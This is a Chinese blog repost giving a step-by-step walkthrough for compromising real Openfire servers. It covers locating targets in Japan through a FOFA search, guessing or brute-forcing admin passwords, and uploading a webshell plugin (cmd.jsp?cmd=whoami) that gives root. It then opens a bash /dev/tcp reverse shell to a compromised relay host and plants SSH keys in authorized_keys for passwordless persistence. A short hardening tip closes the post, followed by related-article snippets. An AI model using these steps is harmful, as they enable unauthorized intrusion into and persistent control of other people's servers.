OpenFire后台插件上传获取webshell及免密码登录linux服务器

最新推荐文章于 2022-02-26 17:08:50 发布
最新推荐文章于 2022-02-26 17:08:50 发布
阅读量264 收藏
点赞数
文章标签: 操作系统 运维 shell
原文链接:http://www.cnblogs.com/pshell/p/7654646.html
版权
1.目标获取

1 fofa.so 网站使用搜索body="Openfire, 版本 : " && country=JP ,可以获取日本存在的 Openfire 服务器。如图 1 所示。

1 搜索目标
2.暴力或者使用弱口令登录系统

    一般弱口令admin/admin admin/admin888 admin/123456 ,如果不是这些请直接使用 burpsuite 进行暴力破解,能够正常访问的网站,如图 2 所示, openfire 可能开放不同端口。
2openfire 后台登陆地址
3.进入后台

    输入密码正确后,如图3 所示,进入后台,可以查看服务器设置,查看用户 / 用户群,查看会话,分组聊天以及插件等信息。
3 进入后台

4.查看并上传插件

    单击插件,再其中可以看到所有的插件列表,在上传插件下单击上传插件,选择专门生成的openfire webshell 的插件,如图 4 所示。

4 上传插件
在本次测试中,从互联网收集了连个插件,如图5 所示,均成功上传。
5 上传带 webshell 的插件
5.获取webshell

1helloworld插件获取webshell

   单击服务器- 服务器设置,如图 6 所示,如果 helloworld 插件上传并运行成功,则会在配置文件下面生成一个用户接口设置。单击该链接即可获取 webshel ,如图 7 所示。
6 查看服务器设置
7 获取 webshell

2broadcast插件获取webshell

 

    通过url+ plugins/broadcast/webshell 文件名称来和获取:
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp
    helloworld 插件中也可以通过地址来获取
http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp
   如图8 ,图 9 所示,分别获取broadcast webshell 以及查看当前用户权限为 root

8 获取当前用户权限
9 获取 webshell

6.root密码登录服务器

    渗透到这里按照过去的思路应该已经结束,不过笔者还想尝试另外一种思路,虽然我们通过webshell 可以获取 /etc/shadow 文件,但该 root 及其它用户的密码明显不是那么容易被破解的。服务器上面用 ssh ,能否利用公私钥来解决访问问题。

1)反弹到肉鸡
执行一下命令,将该服务器反弹到肉鸡服务器xxx.xxx.xxx.xxx 8080 端口,需要提前使用 nc 监听 8080 端口,也即执行“ nc -vv -l -p 8080 ”如图 10 所示。
10 监听 8080 端口
2)反弹shell到肉鸡
执行命令“bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反弹到肉鸡,如图 11 所示,获取一个反弹 shell
11 反弹 shell

7.实际操作流程

1 )远程服务器生成公私钥
在被渗透的服务器上执行“ssh-keygen -t rsa”命令,默认三次回车,如图 12 所示,会在 root/.ssh/ 目录下生成 id_rsa id_rsa.pub ,其中 id_rsa 为服务器私钥,特别重要, id_rsa.pub 为公钥。
12 在远处服务器上生成公私钥
2 )本地 linux 上生成公私钥
   在本地linux 上执行命令 “ssh-keygen -t rsa”生成公私钥,将远程服务器的 id_rsa 下载到本地,执行命令“cat id_rsa > /root/.ssh/authorized_keys”命令,将远处服务器的私钥生成到authorized_keys文件。
3 )将本地公钥上传到远程服务器上并生成authorized_keys
cat id_rsa.pub >/root/.ssh/authorized_keys
4 )删除多余文件
rm id_rsa.pub
rm id_rsa
5 )登录服务器
    使用“ssh [email]root@1xx.1xx.111.1xx[/email]”登录服务器,不用输入远程服务器的密码,达到完美登录服务器的目的。效果如图 13 所示。
13 成功登录对方服务器
8.总结

1 Openfire 需要获取管理员帐号和密码,目前通杀所有帮本。 Openfire 最新版本为 4.1.5.
2 )可以通过 burpsuite 进行 admin 管理员帐号的暴力破解。
3 )使用 openfire 安全加固,可以使用强密码,同时严格设置插件权限,建议除了必须的插件目录外,禁用新创建目录。

转载于:https://www.cnblogs.com/pshell/p/7654646.html

weixin_30839881
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[转]Openfire后台getshell(编译好的插件
weixin_33994429的博客
03-21 2012
0x01 环境:eclipse+openfire源码 源码地址:http://www.igniterealtime.org... 最新版openfire安装方法可参考:http://www.51itong.net/openfi... 0x02 webshell插件生成方法 插件生成思路:将自己想使用的jsp马或者其他辅助jsp加入到已有的...
openfire插件
07-31
openfire插件基本代码,可以重复利用
Openfire消息记录插件(消息、上传、下载插件合集)
04-13
openfire插件,本插件直接在openfire里安装即可,集成消息在线和离线的存储、查询接口,图片、表情、语音文件的上传和下载对外接口,因此,不需要修改openfire源码即可满足聊天的实用功能,对外提供3个接口,一消息历史记录返回xml/json 二上传文件接口 三 下载文件接口.
如何实现免认证访问Openfire插件中Servlet
renfengmei技术博客
03-24 833
Openfire插件中提供对外的Servlet服务,访问地址: http://server:9090/plugins/xxxservice/xxservlet 默认情况下访问该地址是会转向到Openfire认证界面,即需要认证才能访问该地址。 要免认证访问,需要如以下代码实现: Servelet代码: public class XXXXServiceServlet extends H
openfire shell插件
06-15
openfire shell插件
基于Openfire服务器的用户行为审计插件设计与实现
01-27
针对Openfire用户线上行为监测与审计的实际需求,设计和实现了一个基于Openfire服务器的用户行为审计插件actionAuditor。插件由3大模块组成,能实现用户行为记录、查询、存储、备份、导出、排序、统计分析以及免审计...
openfire服务器安装配置、集成、插件安装配置、参数优化.docx
12-01
本文档主要介绍了如何在Linux环境下安装、配置、集成Openfire服务器,以及进行插件安装和参数优化。 首先,确保在服务器上已经安装了JDK 1.7_80环境,因为Openfire运行需要Java支持。接着,解压Openfire的安装包`...
openfire服务器插件
11-29
openfire服务器插件,用于扩展服务器的管理
基于Openfire服务器的用户行为审计插件设计与实现.pdf
11-27
基于Openfire服务器的用户行为审计插件设计与实现 本文设计和实现了一个基于Openfire服务器的用户行为审计插件,名为actionAuditor。该插件由三个模块组成,能够实现用户行为记录、查询、存储、备份、导出、排序、...
webshell
阳光梦的专栏
06-04 1444
漏洞原理                                                                                                 文件上传功能本身是一个正常的业务需求,对于网站来说,很多时候需要用户将文件上传服务器,例如上传自定义头像,文件共享,发送邮件时添加附件,文件备份与恢复。所以“文件上传”本身没有问题,有
openfire编译
流光的博客
11-08 468
1、openfire_src_3_10_2.zip解压到workspace,改文件夹名为openfire。 2、复制/openfire/build/eclipse下的classpath、project、settings到/openfire下,改名.classpath、.project、.settings。(可以通过复制其他项目文件或命令行改名) 3、eclipse->import->Exist
Oday,简单拿webshell
weixin_34417814的博客
03-30 141
关键字:inurl:urlProblem.asp 谷歌一下~ 找个站打开 然后 替换存在漏洞 的文件 /admin/include/upload_form.asp 把这个文件urlProblem.asp 替换成 上面的漏洞地址。 enter~ 然后传马吧~ 转载于:https://blog.51cto.com/smasher/289517...
后台简单拿webshell
weixin_33691700的博客
01-07 214
我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧! admin appliedtek101. 工具: WSockExpert.exe抓包工具,明小子 打开抓包工具的界面,你会看到什么也没有,然后注意点 左上面那小文件夹图标 ,然后出现选择那个iexplore.exe,找到企业后台管理,然后点o...
信息收集--空间搜索引擎/网盘
热门推荐
m0_37856131的博客
02-26 1万+
信息收集--空间搜索引擎/网盘
web安全之Openfire的脚本上传缺陷分析
si1ence的博客
01-11 402
0x0 背景 一次偶然的机会发现某台Web服务器被黑了之后被植入了挖矿病毒,然后忙活了好久清理完病毒之后就开始思考思考到底是怎么被黑的,俗话说的好死要死得明白。 服务器本身只开发了外网的web端口,然后初步怀疑是从web服务端进来的于是先用D盾查杀一下果不出所料查杀出一个webshell,路径却在Openfire目录下以前没有接触过这个玩意遂研究之。 0x1 功能介绍 Openfire 是基于XMPP 协议的IM 的服务器端的一个实现,虽然当两个用户连接后,可以通过点...
openfire开发(五)openfire插件打包另类打法
weixin_33813128的博客
10-30 316
由于我们的openfire插件引入的包越来越多,导致插件也越来越大,而且openfire3.10.x之后取消了pack200的打包方式(压缩),导致打包出来的插件越来越大,大概10M左右,上传速度大概200KB/s,有时候上传插件到50%多,因为网络不好,导致又得重传,蛋疼~~~因此就想琢磨着能不能不将插件开发时依赖的第三方包,不打包到插件之中。以下分析都是基于openfir...
在网页中挂马和清除木马的方法
一个程序员的成长道路
06-28 7553
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
openfire 插件shell
最新发布
08-14
Openfire 插件 shell 是一个官方提供的插件,可以让用户通过命令行界面来管理和控制 Openfire 服务器。通过 shell 插件,管理员可以执行一些常见的管理操作,如用户管理、群组管理、消息发送等,而无需登录到 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值